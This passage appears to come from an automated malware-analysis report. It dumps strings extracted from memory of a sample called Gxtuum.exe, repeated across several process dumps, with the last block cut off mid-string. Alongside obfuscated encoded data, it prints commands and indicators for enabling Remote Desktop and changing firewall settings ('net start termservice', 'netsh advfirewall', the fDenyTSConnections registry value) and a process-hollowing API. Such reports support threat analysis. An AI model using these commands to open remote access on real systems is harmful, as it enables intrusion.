LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 00000009.00000000.1959547793.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 00000009.00000000.1959547793.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000C.00000002.2561822917.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000C.00000002.2561822917.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000C.00000000.2559783171.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000C.00000000.2559783171.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000D.00000002.3163105032.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000D.00000002.3163105032.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa 
LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                          Source: Gxtuum.exe, 0000000E.00000000.3761151713.0000000000461000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: net start termservice
                          Source: Gxtuum.exe, 0000000E.00000000.3761151713.0000000000461000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr 